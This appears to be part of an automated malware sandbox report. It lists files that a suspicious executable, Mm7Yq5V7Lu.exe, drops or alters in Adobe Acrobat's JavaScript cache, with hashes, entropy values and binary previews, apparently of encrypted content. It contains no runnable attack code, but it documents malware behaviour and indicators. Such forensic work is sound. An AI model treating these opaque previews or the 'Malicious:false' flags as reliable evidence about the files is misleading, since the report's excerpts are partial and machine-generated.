                                                                                                                                                      Preview: ...;-...A2..*h...aq..*...p.{.8....d....B;.......2{jC...g.K5.....KiF:.....Y.....Lk.R.Ne...r......4?Q...I...4...A.. ]c....'......d..6[....U...^to..s..U.7......x$......=......S.@.S..-U=....>iSBM.."G....8....G.2B...C.i./.].K.....E...H8..@.....<..=..._..q3..5.}....R.=0..9.|.C..XJ..t.s.R....`.tqtJM*...G5f.',.....3.5.\..q..mT. ...o.U.z....67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\de789e80edd740d6_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.748707152752462
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:4b8ZWU4fs/oslyTAlzK8sevWAVgKTaCB7RZ0cHYIgtyUzXS:56s/xlyUlzCwgck38H
                                                                                                                                                      MD5:AC6293253C32623ED26107A6F47DBA1A
                                                                                                                                                      SHA1:58043B2072DA409B80C4C0D5F0F4A964335FEA02
                                                                                                                                                      SHA-256:E3FEB6FFB842DF2239E5C57A3AEEBAA6BB503E9C2B25BD1DE72C4913DBADBC29
                                                                                                                                                      SHA-512:B49D76858AB8D5A857B5CA19026741C19D8D9013E5AEDDAD628AE606F01170023C7055A5173FE919692B7440F47F56BE74458CAD15136140804B4405F2E2B2DA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .j}>..i.r..+.........*@.:.b.F..\...6.y...3U.N...yP.K..7.......m.6n.m%.7.u.`.P.E..".0..]u.}`.=....z}.....7..~.YWw....).....d..l>L7.....W..a....rYu........g4.o.v..;.>Z.>.dqo..Q.,.L..n."BU...d...~0.ai.M...I....}[..nL`..M....g.._U..1(.z!.P.*.o.S..S.hx..D$i..o.....#...k...&....(.....}..Te6.G..k.8._.!s.....g...R..|..C...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\de789e80edd740d6_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.748707152752462
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:4b8ZWU4fs/oslyTAlzK8sevWAVgKTaCB7RZ0cHYIgtyUzXS:56s/xlyUlzCwgck38H
                                                                                                                                                      MD5:AC6293253C32623ED26107A6F47DBA1A
                                                                                                                                                      SHA1:58043B2072DA409B80C4C0D5F0F4A964335FEA02
                                                                                                                                                      SHA-256:E3FEB6FFB842DF2239E5C57A3AEEBAA6BB503E9C2B25BD1DE72C4913DBADBC29
                                                                                                                                                      SHA-512:B49D76858AB8D5A857B5CA19026741C19D8D9013E5AEDDAD628AE606F01170023C7055A5173FE919692B7440F47F56BE74458CAD15136140804B4405F2E2B2DA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .j}>..i.r..+.........*@.:.b.F..\...6.y...3U.N...yP.K..7.......m.6n.m%.7.u.`.P.E..".0..]u.}`.=....z}.....7..~.YWw....).....d..l>L7.....W..a....rYu........g4.o.v..;.>Z.>.dqo..Q.,.L..n."BU...d...~0.ai.M...I....}[..nL`..M....g.._U..1(.z!.P.*.o.S..S.hx..D$i..o.....#...k...&....(.....}..Te6.G..k.8._.!s.....g...R..|..C...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\e0924daf8f4398dc_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.768865653295068
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TOsF9jynhxzFAC0eLzK8sevWAVgKTaCB7RZ0cHYIgtyUzuP833:Ff2nTFAbuzCwgck38d833
                                                                                                                                                      MD5:D872E6FF5AFB3197DCCA5BBC4E701BD8
                                                                                                                                                      SHA1:F6F47FB315E687E9BA3BB2DB087B3D82EFBD8E36
                                                                                                                                                      SHA-256:5252256C6EA1B9BD4AB5EC7592AA31B4E7F238A88F7678AEFA580287544B5861
                                                                                                                                                      SHA-512:F43CB6DFDE10B8083FDC2BED17FDA98BB94A62C966A2793A679A7B8040E2C36A613B93A55DE00F5004DBB5BBC68F1CA05CC899A2269D09D569F27197EA802789
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 7;z..sSK#.J.8...r+)f..~...w...2...O.Z.,S].R.%.K.. ...>c.5.A|._8..u.1.V5Nk.h.f...;...I..H...4....s../...c.j.T..O...2..*2~.B*.K..)5\.5ey..W....p.....)..3r....|.8...Jj......P.+.Un...l../@5$..6..l../PmgJSk#..F....k.@..(.}.E.\9.~/....?..`n.A..[......`^.../..#,...d....}..%...K!....A.!S.T..T.0..^`..p...hr}............@./.S.......&..N..Y67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\e0924daf8f4398dc_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.768865653295068
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TOsF9jynhxzFAC0eLzK8sevWAVgKTaCB7RZ0cHYIgtyUzuP833:Ff2nTFAbuzCwgck38d833
                                                                                                                                                      MD5:D872E6FF5AFB3197DCCA5BBC4E701BD8
                                                                                                                                                      SHA1:F6F47FB315E687E9BA3BB2DB087B3D82EFBD8E36
                                                                                                                                                      SHA-256:5252256C6EA1B9BD4AB5EC7592AA31B4E7F238A88F7678AEFA580287544B5861
                                                                                                                                                      SHA-512:F43CB6DFDE10B8083FDC2BED17FDA98BB94A62C966A2793A679A7B8040E2C36A613B93A55DE00F5004DBB5BBC68F1CA05CC899A2269D09D569F27197EA802789
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 7;z..sSK#.J.8...r+)f..~...w...2...O.Z.,S].R.%.K.. ...>c.5.A|._8..u.1.V5Nk.h.f...;...I..H...4....s../...c.j.T..O...2..*2~.B*.K..)5\.5ey..W....p.....)..3r....|.8...Jj......P.+.Un...l../@5$..6..l../PmgJSk#..F....k.@..(.}.E.\9.~/....?..`n.A..[......`^.../..#,...d....}..%...K!....A.!S.T..T.0..^`..p...hr}............@./.S.......&..N..Y67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.751625374634259
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GoNkLK2j8nF+m3zK8sevWAVgKTaCB7RZ0cHYIgtyUz5:gK2jYzCwgck38s
                                                                                                                                                      MD5:9C7BF962B6A88B861B49D94D48B507B9
                                                                                                                                                      SHA1:30C013E00B1D29FD330D4AE58E4658AA9BE4C5F1
                                                                                                                                                      SHA-256:DB48C50F1A7D56320EFF6BC0A87B200CD5B2DC9ABB665811DAEDC48D45C178A2
                                                                                                                                                      SHA-512:FB8896B06C2EDC3C02CF5B8A44E47472CADE5B40020DD9D8971791DE947DB37C8362200EEB310AE1C4BE77CAD8F55C42F007F137FBCC25EBB3D136E35550E6D9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: qj{@$..!..C...... .B.........T.A..~..=..u....h....9H..........ve.2.Z"......B.sY^.D.X......v..o.q.}<..d`#..6T.Hh#[.........*..5....-.k.k4M..C.|.M.......s?.>c.3\.=....._....A........{.]..L.".+.^..|S.%..$.i.!.Dn@.)..2Q..&m..U7.....d...3.|.@..9Sb7.G..5V.....q....:^q].!..dT.v.$..di}=."!...y..K.......:....Q..o...._.W.kzK.<67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.751625374634259
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GoNkLK2j8nF+m3zK8sevWAVgKTaCB7RZ0cHYIgtyUz5:gK2jYzCwgck38s
                                                                                                                                                      MD5:9C7BF962B6A88B861B49D94D48B507B9
                                                                                                                                                      SHA1:30C013E00B1D29FD330D4AE58E4658AA9BE4C5F1
                                                                                                                                                      SHA-256:DB48C50F1A7D56320EFF6BC0A87B200CD5B2DC9ABB665811DAEDC48D45C178A2
                                                                                                                                                      SHA-512:FB8896B06C2EDC3C02CF5B8A44E47472CADE5B40020DD9D8971791DE947DB37C8362200EEB310AE1C4BE77CAD8F55C42F007F137FBCC25EBB3D136E35550E6D9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: qj{@$..!..C...... .B.........T.A..~..=..u....h....9H..........ve.2.Z"......B.sY^.D.X......v..o.q.}<..d`#..6T.Hh#[.........*..5....-.k.k4M..C.|.M.......s?.>c.3\.=....._....A........{.]..L.".+.^..|S.%..$.i.!.Dn@.)..2Q..&m..U7.....d...3.|.@..9Sb7.G..5V.....q....:^q].!..dT.v.$..di}=."!...y..K.......:....Q..o...._.W.kzK.<67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f4a0d4ca2f3b95da_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.761257058600545
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:O7clBEaFlzK8sevWAVgKTaCB7RZ0cHYIgtyUzK+bQ:O7cPE2zCwgck38WQ
                                                                                                                                                      MD5:1B43DF655395F2997C93C67564D0FAB1
                                                                                                                                                      SHA1:0B82146FBF89E68DEF96C4D45573B7761B133383
                                                                                                                                                      SHA-256:D7A09F6190CA53EA468BC4054EB5050A198DE42C05EF3C0992B4438394A58A6F
                                                                                                                                                      SHA-512:15C71112F56D88BF8D0CE1339246D1FAC5525E9F6236488256EE7718BA6518D7B661F2B9A5DD3CB2FC5130B7255AF5465A7D3AC5E28385AA7B56C832A5D261E5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ......e6......./g.%q.b.....^r.m..M..E.n.O....?..}J.=[_.....?~C..iz?.2..........<7h)x..ZVV..<<..........=.........)B..{.}.=.w .G.f.#.....(..(.-.I.F+.!.w.....c.....6t.$@.$.L..H7#.y.....qq)O...n.l...A.ng...5i."../.{......'}.b./.U4.#...>..u.&..<...I/.<..V...o...~.DZ7....6...|:f.....O8(1....:...h.m.x..2...."o.....34..*.$......[*..a...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f4a0d4ca2f3b95da_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.761257058600545
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:O7clBEaFlzK8sevWAVgKTaCB7RZ0cHYIgtyUzK+bQ:O7cPE2zCwgck38WQ
                                                                                                                                                      MD5:1B43DF655395F2997C93C67564D0FAB1
                                                                                                                                                      SHA1:0B82146FBF89E68DEF96C4D45573B7761B133383
                                                                                                                                                      SHA-256:D7A09F6190CA53EA468BC4054EB5050A198DE42C05EF3C0992B4438394A58A6F
                                                                                                                                                      SHA-512:15C71112F56D88BF8D0CE1339246D1FAC5525E9F6236488256EE7718BA6518D7B661F2B9A5DD3CB2FC5130B7255AF5465A7D3AC5E28385AA7B56C832A5D261E5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ......e6......./g.%q.b.....^r.m..M..E.n.O....?..}J.=[_.....?~C..iz?.2..........<7h)x..ZVV..<<..........=.........)B..{.}.=.w .G.f.#.....(..(.-.I.F+.!.w.....c.....6t.$@.$.L..H7#.y.....qq)O...n.l...A.ng...5i."../.{......'}.b./.U4.#...>..u.&..<...I/.<..V...o...~.DZ7....6...|:f.....O8(1....:...h.m.x..2...."o.....34..*.$......[*..a...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.749213307242708
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:comD+WJMO3CFkQjnq31zK8sevWAVgKTaCB7RZ0cHYIgtyUzhU:comD+4yKsq31zCwgck38D
                                                                                                                                                      MD5:B33565F90868FB29513B5D828A2CD3AE
                                                                                                                                                      SHA1:4B3F8AED860B4CA8F05CE4B392C961CBEAE4F59A
                                                                                                                                                      SHA-256:6692CFC7173272A28A0A1BD68F3286F3A421D80FFD7243C7225FE07E9531B264
                                                                                                                                                      SHA-512:50D2BF565D2D5D7F8A92A925AA85CDA2E03F52F38C39B49AE1832F65A1973E853B23E6462DD2D3662F95CC928FD6276AC557F0D3BB43F83A61CA14F8E5B234C4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .CK=.q..m...e....PM........Q.K`...~. r-.k.-o.L.....%5.<..R...n.,.m.[C..z.4#.Z.J..yX!._.d.9....Jh....;IK=...}:...T. ./.l..L..AH..nV.m~p..!^0. \....n...lw....5L...-q......o0..1...Q.~.V.T"..L.;..e.~I.=..:..3~....h(.r..[.W...#..nnknM..p.i..J{8.}..I.*...O.....E..h..4..I.^FMy.u..6...A1(...B..t)....&.,..[......U...7....i./'.........%67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.749213307242708
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:comD+WJMO3CFkQjnq31zK8sevWAVgKTaCB7RZ0cHYIgtyUzhU:comD+4yKsq31zCwgck38D
                                                                                                                                                      MD5:B33565F90868FB29513B5D828A2CD3AE
                                                                                                                                                      SHA1:4B3F8AED860B4CA8F05CE4B392C961CBEAE4F59A
                                                                                                                                                      SHA-256:6692CFC7173272A28A0A1BD68F3286F3A421D80FFD7243C7225FE07E9531B264
                                                                                                                                                      SHA-512:50D2BF565D2D5D7F8A92A925AA85CDA2E03F52F38C39B49AE1832F65A1973E853B23E6462DD2D3662F95CC928FD6276AC557F0D3BB43F83A61CA14F8E5B234C4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .CK=.q..m...e....PM........Q.K`...~. r-.k.-o.L.....%5.<..R...n.,.m.[C..z.4#.Z.J..yX!._.d.9....Jh....;IK=...}:...T. ./.l..L..AH..nV.m~p..!^0. \....n...lw....5L...-q......o0..1...Q.~.V.T"..L.;..e.~I.=..:..3~....h(.r..[.W...#..nnknM..p.i..J{8.}..I.*...O.....E..h..4..I.^FMy.u..6...A1(...B..t)....&.,..[......U...7....i./'.........%67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.7671539028666885
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:KQOUFg9rmdGub3zK8sevWAVgKTaCB7RZ0cHYIgtyUzAGW:KQOjrmdGk3zCwgck383GW
                                                                                                                                                      MD5:058AB3252CE7965957AB571EE44B0AA3
                                                                                                                                                      SHA1:1EB102ECC55082377D0D8F9D5A73BFA045451007
                                                                                                                                                      SHA-256:03200E907580BBFA61BBFFDFAB5DA49485F68140837248823247C2BFC405BE79
                                                                                                                                                      SHA-512:D2DC8347862EF64DCD47FF36F6C3BF9A9E800E7E4CB02D08F08B335963E185E082D9A20A5679622F481CE6881CB12A38091B630DE3B2E74B0C289D4E4BBF523B
                                                                                                                                                      Malicious:false
